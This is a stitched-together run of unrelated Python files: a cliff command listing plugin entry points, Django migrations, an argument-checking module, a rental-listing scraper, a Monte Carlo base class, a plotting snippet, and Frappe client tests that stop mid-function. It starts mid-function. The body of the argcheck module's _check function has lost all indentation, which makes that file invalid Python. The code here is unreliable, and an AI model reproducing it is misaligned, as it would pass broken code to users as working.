        rows = ((name,) for name in sorted(names))
        return (columns, rows)
class GroupShow(lister.Lister):
    """Shows the members of a specific group.
    """

    def get_parser(self, prog_name):
        parser = super(GroupShow, self).get_parser(prog_name)
        parser.add_argument(
            'group',
            help='the name of the group to show',
        )
        return parser

    def take_action(self, parsed_args):
        rows = []
        for ep in pkg_resources.iter_entry_points(parsed_args.group):
            # Try importing the plugin so load failures can be reported
            # in the output table instead of aborting the command.
            load_error = ''
            try:
                ep.load()
            except Exception as err:
                load_error = str(err)  # unicode?
            rows.append((
                ep.name,
                ep.module_name,
                '.'.join(ep.attrs),
                str(ep.dist),  # unicode?
                load_error,
            ))
        return (
            ('Name', 'Module', 'Member', 'Distribution', 'Error'),
            rows,
        )
|
# Generated by Django 2.2.11 on 2020-05-20 11:15
from django.db import migrations, models
import django.db.models.deletion
# Auto-generated migration: adds an Outlook e-mail field to Resource and
# refreshes verbose_name metadata on the accessibility models.  Migrations
# are append-only history — do not edit retroactively.
class Migration(migrations.Migration):

    dependencies = [
        ('resources', '0116_merge_20200520_1347'),
    ]

    operations = [
        # New optional contact e-mail used for Outlook integration.
        migrations.AddField(
            model_name='resource',
            name='resource_email',
            field=models.EmailField(blank=True, max_length=254, null=True, verbose_name='Email for Outlook'),
        ),
        # The remaining AlterField operations only change verbose_name
        # labels (Finnish); no schema change beyond Django's bookkeeping.
        migrations.AlterField(
            model_name='accessibilityvalue',
            name='created_at',
            field=models.DateTimeField(auto_now_add=True, verbose_name='Lisäysaika'),
        ),
        migrations.AlterField(
            model_name='accessibilityvalue',
            name='modified_at',
            field=models.DateTimeField(auto_now=True, verbose_name='Muokkausaika'),
        ),
        migrations.AlterField(
            model_name='accessibilityviewpoint',
            name='created_at',
            field=models.DateTimeField(auto_now_add=True, verbose_name='Lisäysaika'),
        ),
        migrations.AlterField(
            model_name='accessibilityviewpoint',
            name='modified_at',
            field=models.DateTimeField(auto_now=True, verbose_name='Muokkausaika'),
        ),
        migrations.AlterField(
            model_name='accessibilityviewpoint',
            name='order_text',
            field=models.CharField(default='0', max_length=200, verbose_name='Tilaus'),
        ),
        migrations.AlterField(
            model_name='resourceaccessibility',
            name='created_at',
            field=models.DateTimeField(auto_now_add=True, verbose_name='Lisäysaika'),
        ),
        migrations.AlterField(
            model_name='resourceaccessibility',
            name='modified_at',
            field=models.DateTimeField(auto_now=True, verbose_name='Muokkausaika'),
        ),
        migrations.AlterField(
            model_name='resourceaccessibility',
            name='resource',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='accessibility_summaries', to='resources.Resource', verbose_name='Resurssi'),
        ),
        migrations.AlterField(
            model_name='unitaccessibility',
            name='created_at',
            field=models.DateTimeField(auto_now_add=True, verbose_name='Lisäysaika'),
        ),
        migrations.AlterField(
            model_name='unitaccessibility',
            name='modified_at',
            field=models.DateTimeField(auto_now=True, verbose_name='Muokkausaika'),
        ),
        # NOTE(review): verbose_name 'Resurssi' ("resource") on a Unit FK
        # looks copy-pasted from the resource field above — reflects the
        # model definition, flag upstream if unintended.
        migrations.AlterField(
            model_name='unitaccessibility',
            name='unit',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='accessibility_summaries', to='resources.Unit', verbose_name='Resurssi'),
        ),
    ]
|
# Generated by Django 3.2.5 on 2021-08-12 20:40
from django.db import migrations, models
import django.db.models.deletion
# Auto-generated migration: replaces the Asset.status field with a nullable
# FK to Borrower, and refreshes choice/label metadata on related models.
# Migrations are append-only history — do not edit retroactively.
class Migration(migrations.Migration):

    dependencies = [
        ('devices', '0038_auto_20210723_1204'),
    ]

    operations = [
        # Drop the old status field (data in it is discarded).
        migrations.RemoveField(
            model_name='asset',
            name='status',
        ),
        # Track who currently holds the asset; SET_NULL keeps the asset row
        # when the borrower record is deleted.
        migrations.AddField(
            model_name='asset',
            name='borrower',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='devices.borrower'),
        ),
        migrations.AlterField(
            model_name='borrower',
            name='borrower_type',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='devices.borrowertype', verbose_name='Borrower Type'),
        ),
        # Choice-metadata refreshes below are bookkeeping only.
        migrations.AlterField(
            model_name='contactinfoentry',
            name='primary_phone_type',
            field=models.PositiveSmallIntegerField(choices=[(3, 'Mobile'), (1, 'Work'), (2, 'Home')], default=3, verbose_name='Primary Phone Number Type'),
        ),
        migrations.AlterField(
            model_name='contactinfoentry',
            name='secondary_phone_type',
            field=models.PositiveSmallIntegerField(blank=True, choices=[(3, 'Mobile'), (1, 'Work'), (2, 'Home')], null=True, verbose_name='Secondary Phone Number Type'),
        ),
        migrations.AlterField(
            model_name='transaction',
            name='action',
            field=models.PositiveSmallIntegerField(choices=[(6, 'Report Stolen'), (4, 'Report Dysfunctional'), (5, 'Report Lost'), (3, 'Report Damage'), (1, 'Check-In'), (2, 'Check-Out')], null=True),
        ),
    ]
|
# #############################################################################
# argcheck.py
# ===========
# Author : Sepand KASHANI [kashani.sepand@gmail.com]
# #############################################################################
"""
Helper functions to ease argument checking.
"""
import collections.abc as abc
import functools
import inspect
import keyword
import math
import numbers
import numpy as np
import scipy.sparse as sparse
def check(*args):
    """
    Validate function parameters using boolean tests.

    Decorator factory: each named parameter of the decorated function is
    passed through its boolean test, and :py:exc:`ValueError` is raised
    when a test returns :py:obj:`False`.

    Parameters
    ----------
    *args
        2 invocations supported:

        a) 2-argument mode: ``check(param_name, bool_func)``.
        b) 1-argument mode: ``check({param_name: bool_func, ...})``.

    Returns
    -------
    :py:obj:`~typing.Callable`
        Function decorator.

    Raises
    ------
    :py:exc:`ValueError`
        If any of the boolean functions return :py:obj:`False`.

    Examples
    --------
    .. doctest::

       >>> @check('x', lambda obj: obj == 5)  # doctest: +SKIP
       ... def f(x):
       ...     return x
    """
    if len(args) == 2:
        name, func = args
        return _check(m={name: func})
    if len(args) == 1:
        return _check(m=args[0])
    raise ValueError("Expected 1 or 2 arguments.")
def _check(m):
if not isinstance(m, abc.Mapping):
raise TypeError("Expected (str, boolean function) map")
key_error = lambda k: f"Key[{k}] must be a valid string identifier."
value_error = lambda k: f"Value[Key[{k}]] must be a boolean function."
for k, v in m.items():
if not isinstance(k, str):
raise TypeError(key_error(k))
if not (k.isidentifier() and (not keyword.iskeyword(k))):
raise ValueError(key_error(k))
if not inspect.isfunction(v):
raise TypeError(value_error(k))
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
func_args = inspect.getcallargs(func, *args, **kwargs)
for k, fn in m.items():
if k not in func_args:
raise ValueError(
f"Parameter[{k}] not part of {func.__qualname__}() parameter list."
)
if fn(func_args[k]) is False:
raise ValueError(
f"Parameter[{k}] of {func.__qualname__}()"
f" does not satisfy {fn.__name__}()."
)
return func(*args, **kwargs)
return wrapper
return decorator
def allow_None(func):
    """
    Relax boolean function for :py:obj:`None` input.

    The returned function behaves like `func` except that a :py:obj:`None`
    argument yields :py:obj:`True`.

    Parameters
    ----------
    func : :py:obj:`~typing.Callable`
        Boolean function.

    Returns
    -------
    :py:obj:`~typing.Callable`
        Boolean function.

    Examples
    --------
    .. doctest::

       >>> def is_5(x):
       ...     return x == 5
       >>> allow_None(is_5)(None)
       True
    """
    if not inspect.isfunction(func):
        raise TypeError("Parameter[func] must be a boolean function.")

    @functools.wraps(func)
    def wrapper(x):
        return True if x is None else func(x)

    wrapper.__name__ = f"allow_None({func.__name__})"
    return wrapper
def accept_any(*funcs):
    """
    Lazy union of boolean functions.

    The returned test passes as soon as any of `funcs` returns
    :py:obj:`True`; later functions are not evaluated.

    Parameters
    ----------
    *funcs : list(bool_func)
        Boolean functions.

    Returns
    -------
    :py:obj:`~typing.Callable`
        Boolean function.

    Examples
    --------
    .. doctest::

       >>> accept_any(lambda x: x > 0, lambda x: x == -1)(-1)
       True
    """
    if not all(inspect.isfunction(fn) for fn in funcs):
        raise TypeError("Parameter[*funcs] must contain boolean functions.")

    def union(x):
        # any() short-circuits, preserving the lazy evaluation order.
        return any(fn(x) is True for fn in funcs)

    union.__name__ = f"accept_any({[fn.__name__ for fn in funcs]})"
    return union
def require_all(*funcs):
    """
    Lazy intersection of boolean functions.

    The returned test fails as soon as any of `funcs` returns
    :py:obj:`False`; later functions are not evaluated.

    Parameters
    ----------
    *funcs : list(bool_func)
        Boolean functions.

    Returns
    -------
    :py:obj:`~typing.Callable`
        Boolean function.

    Examples
    --------
    .. doctest::

       >>> require_all(lambda x: x > 0, lambda x: x <= 5)(3)
       True
    """
    if not all(inspect.isfunction(fn) for fn in funcs):
        raise TypeError("Parameter[*funcs] must contain boolean functions.")

    def intersection(x):
        # all() short-circuits; only an explicit False result rejects,
        # matching the original `fn(x) is False` test.
        return all(fn(x) is not False for fn in funcs)

    intersection.__name__ = f"require_all({[fn.__name__ for fn in funcs]})"
    return intersection
def is_instance(*klass):
    """
    Validate instance types.

    Parameters
    ----------
    *klass : list(type)
        Accepted classes.

    Returns
    -------
    :py:obj:`~typing.Callable`
        Boolean function passing when its argument is an instance of any
        of `klass`.

    Examples
    --------
    .. doctest::

       >>> is_instance(str, int)('5')
       True
    """
    if not all(inspect.isclass(cl) for cl in klass):
        raise TypeError("Parameter[*klass] must contain types.")

    def _is_instance(x):
        return isinstance(x, klass)

    _is_instance.__name__ = f"is_instance({[cl.__name__ for cl in klass]})"
    return _is_instance
def is_scalar(x):
    """
    Return :py:obj:`True` if `x` is a scalar (non-container) object.

    Examples
    --------
    .. doctest::

       >>> is_scalar(5)
       True
       >>> is_scalar([5])
       False
    """
    # Anything implementing the Container protocol (lists, dicts, strings,
    # sets, ndarrays, ...) is treated as non-scalar.
    return not isinstance(x, abc.Container)
def is_array_like(x):
    """
    Return :py:obj:`True` if `x` is an array-like object.

    Array-like means an :py:class:`~numpy.ndarray` or any sequence
    (lists, tuples, ranges, ...); sets and mappings do not qualify.

    Examples
    --------
    .. doctest::

       >>> is_array_like((1, 2))
       True
       >>> is_array_like(set())
       False
    """
    return isinstance(x, (np.ndarray, abc.Sequence))
def is_array_shape(x):
    """
    Return :py:obj:`True` if `x` is a valid array shape specifier.

    A valid shape is a non-empty 1D array-like of strictly-positive
    integers.

    Examples
    --------
    .. doctest::

       >>> is_array_shape((5, 4))
       True
       >>> is_array_shape((5, 0))
       False
    """
    if is_array_like(x):
        # FIX: np.asarray replaces np.array(x, copy=False) — under
        # NumPy >= 2.0, copy=False raises ValueError whenever a copy
        # would be required instead of meaning "copy only if needed".
        x = np.asarray(x)
        if x.ndim == 1:
            if (len(x) > 0) and np.issubdtype(x.dtype, np.integer) and np.all(x > 0):
                return True
    return False
def has_shape(shape):
    """
    Validate array shapes.

    Parameters
    ----------
    shape : list(int)
        Desired array dimensions.

    Returns
    -------
    :py:obj:`~typing.Callable`
        Boolean function passing when its (array-like or sparse) argument
        has exactly `shape`.

    Examples
    --------
    .. doctest::

       >>> has_shape((1,))([5,])
       True
       >>> has_shape([5,])((1, 2))
       False
    """
    if not is_array_shape(shape):
        raise ValueError("Parameter[shape] must be a valid shape specifier.")
    shape = tuple(shape)

    def _has_shape(x):
        if is_array_like(x):
            # FIX: NumPy >= 2.0 makes np.array(x, copy=False) raise when a
            # copy is unavoidable; np.asarray keeps the old semantics.
            x = np.asarray(x)
        elif sparse.isspmatrix(x):
            pass  # sparse matrices already expose .shape
        else:
            return False
        if x.shape == shape:
            return True
        return False

    _has_shape.__name__ = f"has_shape({list(shape)})"
    return _has_shape
def has_ndim(ndim):
    """
    Validate array dimensions.

    Parameters
    ----------
    ndim : int
        Desired number of dimensions (must be positive).

    Returns
    -------
    :py:obj:`~typing.Callable`
        Boolean function passing when its array-like argument has exactly
        `ndim` dimensions.

    Examples
    --------
    .. doctest::

       >>> has_ndim(1)([5,])
       True
       >>> has_ndim(2)((1,))
       False
    """
    if not ((is_integer(ndim)) and (ndim > 0)):
        raise ValueError("Parameter[ndim] must be positive.")

    def _has_ndim(x):
        if is_array_like(x):
            # FIX: np.asarray instead of np.array(x, copy=False), which
            # raises under NumPy >= 2.0 whenever a copy is required.
            x = np.asarray(x)
        else:
            return False
        if x.ndim == ndim:
            return True
        return False

    _has_ndim.__name__ = f"has_ndim({ndim})"
    return _has_ndim
def is_integer(x):
    """
    Return :py:obj:`True` if `x` is an integer.

    Accepts any :py:class:`numbers.Integral` (built-in ``int``, NumPy
    integer scalars, ...); floats are rejected even when whole-valued.
    NOTE: ``bool`` is a subclass of ``int``, so ``is_integer(True)`` is
    also :py:obj:`True`.

    Examples
    --------
    .. testsetup::

       from imot_tools.util.argcheck import is_integer

    .. doctest::

       >>> is_integer(5)
       True

       >>> is_integer(5.0)
       False
    """
    return isinstance(x, numbers.Integral)
def has_integers(x):
    """
    Return :py:obj:`True` if `x` is array-like with an integer dtype.

    Examples
    --------
    .. doctest::

       >>> has_integers([5])
       True
       >>> has_integers([5.])
       False
    """
    if is_array_like(x):
        # FIX: np.asarray instead of np.array(x, copy=False), which raises
        # under NumPy >= 2.0 whenever a copy would be required.
        x = np.asarray(x)
        if np.issubdtype(x.dtype, np.integer):
            return True
    return False
def is_boolean(x):
    """
    Return :py:obj:`True` if `x` is a boolean.

    Only genuine :py:class:`bool` instances qualify; the integers 0/1
    do not.

    Examples
    --------
    .. doctest::

       >>> is_boolean(True), is_boolean(False)
       (True, True)
       >>> is_boolean(0), is_boolean(1)
       (False, False)
    """
    return isinstance(x, bool)
def has_booleans(x):
    """
    Return :py:obj:`True` if `x` is array-like with a boolean dtype.

    Examples
    --------
    .. doctest::

       >>> has_booleans([True])
       True
       >>> has_booleans([1, 0])
       False
    """
    if is_array_like(x):
        # FIX: np.asarray instead of np.array(x, copy=False), which raises
        # under NumPy >= 2.0 whenever a copy would be required.
        x = np.asarray(x)
        if np.issubdtype(x.dtype, np.bool_):
            return True
    return False
def is_even(x):
    """
    Return :py:obj:`True` if `x` is an even integer.

    Examples
    --------
    .. doctest::

       >>> is_even(2)
       True
       >>> is_even(3)
       False
    """
    # Merged guard: non-integers fail immediately; literal True/False
    # returns preserved for `is True` comparisons elsewhere.
    if is_integer(x) and (x % 2 == 0):
        return True
    return False
def has_evens(x):
    """
    Return :py:obj:`True` if `x` contains (only) even integers.

    Examples
    --------
    .. testsetup::

       import numpy as np
       from imot_tools.util.argcheck import has_evens

    .. doctest::

       >>> has_evens(np.arange(5))
       False

       >>> has_evens(np.arange(0, 6, 2))
       True
    """
    if has_integers(x):
        # np.asarray replaces np.array(x, copy=False), which raises under
        # NumPy >= 2.0 whenever the conversion needs a copy (e.g. lists).
        x = np.asarray(x)
        if np.all(x % 2 == 0):
            return True
    return False
def is_odd(x):
    """
    Return :py:obj:`True` when `x` is an odd integer.

    Examples
    --------
    .. testsetup::

       from imot_tools.util.argcheck import is_odd

    .. doctest::

       >>> is_odd(2)
       False

       >>> is_odd(3)
       True
    """
    # Non-integers are never odd; for integers test the parity bit.
    return is_integer(x) and (x % 2 == 1)
def has_odds(x):
    """
    Return :py:obj:`True` if `x` contains (only) odd integers.

    Examples
    --------
    .. testsetup::

       import numpy as np
       from imot_tools.util.argcheck import has_odds

    .. doctest::

       >>> has_odds(np.arange(5))
       False

       >>> has_odds(np.arange(1, 7, 2))
       True
    """
    if has_integers(x):
        # np.asarray replaces np.array(x, copy=False), which raises under
        # NumPy >= 2.0 whenever the conversion needs a copy (e.g. lists).
        x = np.asarray(x)
        if np.all(x % 2 == 1):
            return True
    return False
def is_pow2(x):
    """
    Return :py:obj:`True` if `x` is a power of 2.

    Examples
    --------
    .. testsetup::

       from imot_tools.util.argcheck import is_pow2

    .. doctest::

       >>> is_pow2(8)
       True

       >>> is_pow2(9)
       False
    """
    if is_integer(x):
        # Bit trick: a positive power of two has exactly one bit set.
        # The previous float-based log2/isclose test misclassified very
        # large integers (e.g. 2**1000 + 1) as powers of two because
        # math.log2 rounds to the nearest representable float.
        return x > 0 and (x & (x - 1)) == 0
    return False
def has_pow2s(x):
    """
    Return :py:obj:`True` if `x` contains (only) powers of 2.

    Examples
    --------
    .. testsetup::

       import numpy as np
       from imot_tools.util.argcheck import has_pow2s

    .. doctest::

       >>> has_pow2s([2, 4, 8])
       True

       >>> has_pow2s(np.arange(10))
       False
    """
    if has_integers(x):
        # np.asarray replaces np.array(x, copy=False), which raises under
        # NumPy >= 2.0 whenever the conversion needs a copy (e.g. lists).
        x = np.asarray(x)
        # Bitwise power-of-two test (single bit set); exact on integer
        # dtypes, unlike the previous float log2/allclose comparison.
        if np.all(x > 0) and np.all((x & (x - 1)) == 0):
            return True
    return False
def is_complex(x):
    """
    Return :py:obj:`True` when `x` is a complex number (and not a real one).

    Examples
    --------
    .. testsetup::

       from imot_tools.util.argcheck import is_complex

    .. doctest::

       >>> is_complex(5), is_complex(5.0)
       (False, False)

       >>> is_complex(5 + 5j), is_complex(1j * np.r_[0][0])
       (True, True)
    """
    # Reals are also Complex in the numbers tower, so exclude them.
    return isinstance(x, numbers.Complex) and not isinstance(x, numbers.Real)
def has_complex(x):
    """
    Return :py:obj:`True` if `x` contains complex numbers.

    Examples
    --------
    .. testsetup::

       from imot_tools.util.argcheck import has_complex

    .. doctest::

       >>> has_complex([1j, 0])  # upcast to complex numbers.
       True

       >>> has_complex(1j * np.ones((5, 3)))
       True
    """
    if is_array_like(x):
        # np.asarray replaces np.array(x, copy=False), which raises under
        # NumPy >= 2.0 whenever the conversion needs a copy (e.g. lists).
        x = np.asarray(x)
        if np.issubdtype(x.dtype, np.complexfloating):
            return True
    return False
def is_real(x):
    """
    Return :py:obj:`True` when `x` is a real number (any :py:class:`numbers.Real`).

    Examples
    --------
    .. testsetup::

       from imot_tools.util.argcheck import is_real

    .. doctest::

       >>> is_real(5), is_real(5.0)
       (True, True)

       >>> is_real(1j)
       False
    """
    if isinstance(x, numbers.Real):
        return True
    return False
def has_reals(x):
    """
    Return :py:obj:`True` if `x` contains real numbers.

    Examples
    --------
    .. testsetup::

       from imot_tools.util.argcheck import has_reals

    .. doctest::

       >>> has_reals([5]), has_reals(np.arange(10))
       (True, True)

       >>> has_reals(1j * np.ones(5))
       False
    """
    if is_array_like(x):
        # np.asarray replaces np.array(x, copy=False), which raises under
        # NumPy >= 2.0 whenever the conversion needs a copy (e.g. lists).
        x = np.asarray(x)
        if np.issubdtype(x.dtype, np.integer) or np.issubdtype(x.dtype, np.floating):
            return True
    return False
|
import time
import shutil
import random
import logging
from datetime import date
from typing import Optional
import typer
import joblib
import requests
import pandas as pd
from tqdm import tqdm
from bs4 import BeautifulSoup
from tenacity import retry, stop_after_attempt, wait_fixed, before_sleep_log
from requests.exceptions import HTTPError
from utils.post_processing import adjust_price_, auto_marking_
# Module-level logger, referenced by the (currently disabled) tenacity
# retry decorator on get_page below.
LOGGER = logging.getLogger(__name__)
#headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36'}
# Minimal request headers: short UA string, and 'Connection: close' so each
# request uses a fresh socket instead of a pooled keep-alive connection.
headers = {'User-Agent': 'Chrome/96.0.4664.45', 'Connection' : 'close'}
# Root logger writes to std.log, truncating the file on every run
# (filemode='w'), with timestamps prefixed to each message.
logging.basicConfig(filename="std.log",format='%(asctime)s %(message)s',filemode='w')
logger=logging.getLogger()
logger.setLevel(logging.DEBUG)
def get_attributes(soup):
    """Extract the labelled attribute fields from a 591 listing page.

    Reads the 'ul.labelList' and 'div.detailInfo' sections of the parsed
    page and returns a dict keyed by the (Chinese) field labels of
    interest.
    """
    result = {}
    # First section: label/value pairs rendered as <div class="one"> /
    # <div class="two"> inside each list item.
    for item in soup.select_one("ul.labelList").find_all("li"):
        label = item.find("div", attrs={"class": "one"}).text
        if label in ['養寵物', '管理費', '車 位']:
            value = item.find("div", attrs={"class": "two"}).text
            result[label] = value.replace(":", "")
    # Second section: "label : value" text inside each list item.
    for item in soup.select_one("div.detailInfo").find_all("li"):
        label, value = (part.strip() for part in item.text.split(":"))
        if label in ['格局', '樓層', '坪數', '型態', '社區']:
            result[label] = value
    return result
def retry_condition(exception):
    """Return True if we should retry (in this case when it's an IOError), False otherwise"""
    should_retry = isinstance(exception, (HTTPError, AttributeError))
    if should_retry:
        print(f'HTTP error occurred: {exception}')  # Python 3.6
    return should_retry
#@retry(
#    reraise=True, retry=retry_condition,
#    stop=stop_after_attempt(5), wait=wait_fixed(10),
#    before_sleep=before_sleep_log(LOGGER, logging.INFO))
def get_page(listing_id):
    """Fetch the raw HTML of a 591 rent-detail page.

    Raises
    ------
    requests.HTTPError
        On any 4xx/5xx response. Unlike the previous `assert` on the
        status code, this survives `python -O` and raises the exact
        exception type that retry_condition (above) knows how to handle.
    """
    res = requests.get(
        f'https://rent.591.com.tw/rent-detail-{listing_id}.html', headers=headers)
    res.raise_for_status()
    return res.text
def get_listing_info(listing_id):
    """Scrape a single 591 listing and return its fields as a dict.

    Currently only the page <title> is extracted; the richer extraction
    below the return statement is disabled.
    """
    # Fetch the page exactly once -- the previous code called get_page()
    # twice, downloading the same page two times per listing.
    soup = BeautifulSoup(get_page(listing_id), "lxml")
    result = {"id": listing_id}
    # Full page dump is diagnostic output, not an error condition.
    logger.debug(soup)
    #result['title'] = soup.select_one("span.houseInfoTitle").text
    result['title'] = soup.select_one("title").text
    return result
    # Disabled extraction of the remaining fields (unreachable, kept for
    # reference while the scraper is being debugged):
    '''
    result['addr'] = soup.select_one("span.addr").text
    print(result)
    tmp = soup.select_one("div.detailInfo")
    result['price'] = int(tmp.select_one("div.price").text.split(" ")[
        0].strip().replace(",", ""))
    print(result)
    result['expired_at'] = tmp.find_all("span")[-1].text.split(":")[-1]
    result['desc'] = soup.select_one("div.houseIntro").text.strip()
    result['explain'] = soup.select_one("div.explain").text.strip()
    result['poster'] = soup.select_one(
        "div.avatarRight").find_all("div")[0].text.strip()
    result.update(get_attributes(soup))
    '''
def main(
    source_path: str = "cache/listings.jbl", data_path: Optional[str] = None,
    output_path: Optional[str] = None, limit: int = -1
):
    """Scrape 591 listings and write the merged results to a CSV.

    Parameters
    ----------
    source_path:
        joblib file holding the listing ids to scrape.
    data_path:
        Optional previously collected results (.pd pickle or CSV).
        Already-scraped ids are skipped and the old rows are appended
        to the new output.
    output_path:
        Destination CSV. Defaults to cache/df_listings.csv, or to
        data_path (after backing it up) when data_path is given.
    limit:
        Scrape at most this many ids; non-positive means no limit.
    """
    listing_ids = joblib.load(source_path)
    df_original: Optional[pd.DataFrame] = None
    if data_path:
        if data_path.endswith(".pd"):
            df_original = pd.read_pickle(data_path)
        else:
            df_original = pd.read_csv(data_path)
        # Only scrape ids we have not collected before.
        listing_ids = list(
            set(listing_ids) - set(df_original.id.values.astype("str"))
        )
    print(len(listing_ids))
    if limit > 0:
        listing_ids = listing_ids[:limit]
    print(f"Collecting {len(listing_ids)} entries...")
    data = []
    for id_ in tqdm(listing_ids, ncols=100):
        try:
            data.append(get_listing_info(id_))
            print(data)
        except AttributeError:
            # Presumably raised when an expected element is missing from
            # the page (select_one(...) returned None) -- skip the listing.
            print(f"Skipped {id_}")
            pass
        # Random 0-5s delay between requests to stay polite to the server.
        time.sleep(random.random() * 5)
    df_new = pd.DataFrame(data)
    print(df_new)
    df_new = auto_marking_(df_new)
    df_new = adjust_price_(df_new)
    # Record the scrape date on every new row.
    df_new["fetched"] = date.today().isoformat()
    if df_original is not None:
        # Newly scraped rows first, previous rows after.
        df_new = pd.concat([df_new, df_original],
                           axis=0).reset_index(drop=True)
    if output_path is None and data_path is None:
        # default output path
        output_path = "cache/df_listings.csv"
    elif output_path is None and data_path:
        output_path = data_path
        # Keep a backup of the previous file before overwriting it.
        shutil.copy(data_path, data_path + ".bak")
    # Reconstruct the listing URL from the id for the output table.
    df_new["link"] = "https://rent.591.com.tw/rent-detail-" + \
        df_new["id"].astype("str") + ".html"
    if "mark" not in df_new:
        df_new["mark"] = ""
    # Fixed column order for the CSV output.
    column_ordering = [
        "mark", "title", "price", "price_adjusted", "link", "addr",
        "explain", "社區", "車 位", "管理費",
        "poster", "養寵物", "格局", "坪數", "樓層", "型態",
        "expired_at", "id", "desc", "fetched"
    ]
    df_new[column_ordering].to_csv(output_path, index=False)
    print("Finished!")


if __name__ == "__main__":
    typer.run(main)
|
# -*- coding: utf-8 -*-
class MonteCarloBase(object):
    """Abstract base for Monte Carlo frameworks.

    Keeps track of the configured sample range and which phase the
    framework is in (pre-loop, sampling, post-loop). Subclasses must
    implement ``premcloop`` and ``postmcloop``; instantiating this class
    directly raises NotImplementedError.
    """

    def __init__(self):
        # Abstract class guard: only subclasses may be instantiated.
        if self.__class__ is MonteCarloBase:
            raise NotImplementedError
        # Sample-range bookkeeping (0 means "not configured yet").
        self._d_firstSampleNumber = 0
        self._d_lastSampleNumber = 0
        self._d_currentSampleNumber = 1
        # Phase flags.
        self._d_inSample = False
        self._d_inStochastic = True
        self._d_inPremc = False
        self._d_inPostmc = False

    def premcloop(self):
        msg = "Class needs to implement 'premcloop' method"
        raise NotImplementedError(msg)

    def postmcloop(self):
        msg = "Class needs to implement 'postmcloop' method"
        raise NotImplementedError(msg)

    def nrSamples(self):
        """Return the number of samples."""
        assert self._d_firstSampleNumber
        return self._d_lastSampleNumber - self._d_firstSampleNumber + 1

    def currentSampleNumber(self):
        """Return the current sample number."""
        assert self._d_currentSampleNumber
        return self._d_currentSampleNumber

    def sampleNumbers(self):
        """Return the configured sample numbers (inclusive range)."""
        assert self._d_firstSampleNumber
        return range(self._d_firstSampleNumber, self._d_lastSampleNumber + 1)

    def _inStochastic(self):
        # getattr covers instances where the flag was never initialised.
        return getattr(self, "_d_inStochastic", False)

    def _inPremc(self):
        return self._d_inPremc

    def _inPostmc(self):
        return self._d_inPostmc

    def _lastSampleNumber(self):
        return self._d_lastSampleNumber

    def _firstSampleNumber(self):
        return self._d_firstSampleNumber

    def _setCurrentSample(self, nr):
        """Set the current sample number to nr (must lie in the range)."""
        assert nr >= self._firstSampleNumber()
        assert nr <= self._lastSampleNumber()
        self._d_currentSampleNumber = nr

    def _inSample(self):
        """Return whether a sample is currently executing."""
        return self._d_inSample
|
# Codecademy sandbox shim -- presumably configures matplotlib/seaborn for
# the hosted environment (TODO confirm; required by the course runner).
import codecademylib3_seaborn
import warnings
# Silence library warnings so the plot output stays clean.
warnings.filterwarnings('ignore')
import pandas as pd
from matplotlib import pyplot as plt
import seaborn as sns

# Load the gradebook and plot the mean grade per assignment; seaborn's
# barplot aggregates duplicate assignment rows and draws an error bar.
gradebook = pd.read_csv("gradebook.csv")
sns.barplot(data=gradebook, x="assignment_name", y="grade")
plt.show()
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
import unittest
import frappe
class TestClient(unittest.TestCase):
	"""Tests for frappe.client's document CRUD and remote-call handling."""

	def test_set_value(self):
		"""set_value accepts both a single fieldname and a dict of updates."""
		todo = frappe.get_doc(dict(doctype='ToDo', description='test')).insert()
		frappe.set_value('ToDo', todo.name, 'description', 'test 1')
		self.assertEqual(frappe.get_value('ToDo', todo.name, 'description'), 'test 1')

		frappe.set_value('ToDo', todo.name, {'description': 'test 2'})
		self.assertEqual(frappe.get_value('ToDo', todo.name, 'description'), 'test 2')

	def test_delete(self):
		"""delete removes the document; deleting again raises DoesNotExistError."""
		from frappe.client import delete
		todo = frappe.get_doc(dict(doctype='ToDo', description='description')).insert()
		delete("ToDo", todo.name)
		self.assertFalse(frappe.db.exists("ToDo", todo.name))
		self.assertRaises(frappe.DoesNotExistError, delete, "ToDo", todo.name)

	def test_http_valid_method_access(self):
		"""A write command (frappe.client.save) is allowed over POST."""
		from frappe.client import delete
		from frappe.handler import execute_cmd

		frappe.set_user("Administrator")

		# Simulate an incoming POST request carrying the save command.
		frappe.local.request = frappe._dict()
		frappe.local.request.method = 'POST'

		frappe.local.form_dict = frappe._dict({
			'doc': dict(doctype='ToDo', description='Valid http method'),
			'cmd': 'frappe.client.save'
		})
		todo = execute_cmd('frappe.client.save')

		self.assertEqual(todo.get('description'), 'Valid http method')

		delete("ToDo", todo.name)

	def test_http_invalid_method_access(self):
		"""The same write command over GET is rejected with PermissionError."""
		from frappe.handler import execute_cmd

		frappe.set_user("Administrator")

		frappe.local.request = frappe._dict()
		frappe.local.request.method = 'GET'

		frappe.local.form_dict = frappe._dict({
			'doc': dict(doctype='ToDo', description='Invalid http method'),
			'cmd': 'frappe.client.save'
		})
		self.assertRaises(frappe.PermissionError, execute_cmd, 'frappe.client.save')

	def test_run_doc_method(self):
		"""run_doc_method executes whitelisted doc methods and blocks others."""
		from frappe.handler import execute_cmd

		# Create the fixture report once; reuse it on subsequent runs.
		if not frappe.db.exists('Report', 'Test Run Doc Method'):
			report = frappe.get_doc({
				'doctype': 'Report',
				'ref_doctype': 'User',
				'report_name': 'Test Run Doc Method',
				'report_type': 'Query Report',
				'is_standard': 'No',
				'roles': [
					{'role': 'System Manager'}
				]
			}).insert()
		else:
			report = frappe.get_doc('Report', 'Test Run Doc Method')

		frappe.local.request = frappe._dict()
		frappe.local.request.method = 'GET'

		# Whitelisted, works as expected
		frappe.local.form_dict = frappe._dict({
			'dt': report.doctype,
			'dn': report.name,
			'method': 'toggle_disable',
			'cmd': 'run_doc_method',
			'args': 0
		})

		execute_cmd(frappe.local.form_dict.cmd)

		# Not whitelisted, throws permission error
		frappe.local.form_dict = frappe._dict({
			'dt': report.doctype,
			'dn': report.name,
			'method': 'create_report_py',
			'cmd': 'run_doc_method',
			'args': 0
		})

		self.assertRaises(
			frappe.PermissionError,
			execute_cmd,
			frappe.local.form_dict.cmd
		)

	def test_array_values_in_request_args(self):
		"""List-valued JSON params (fields) survive a real HTTP round trip."""
		import requests
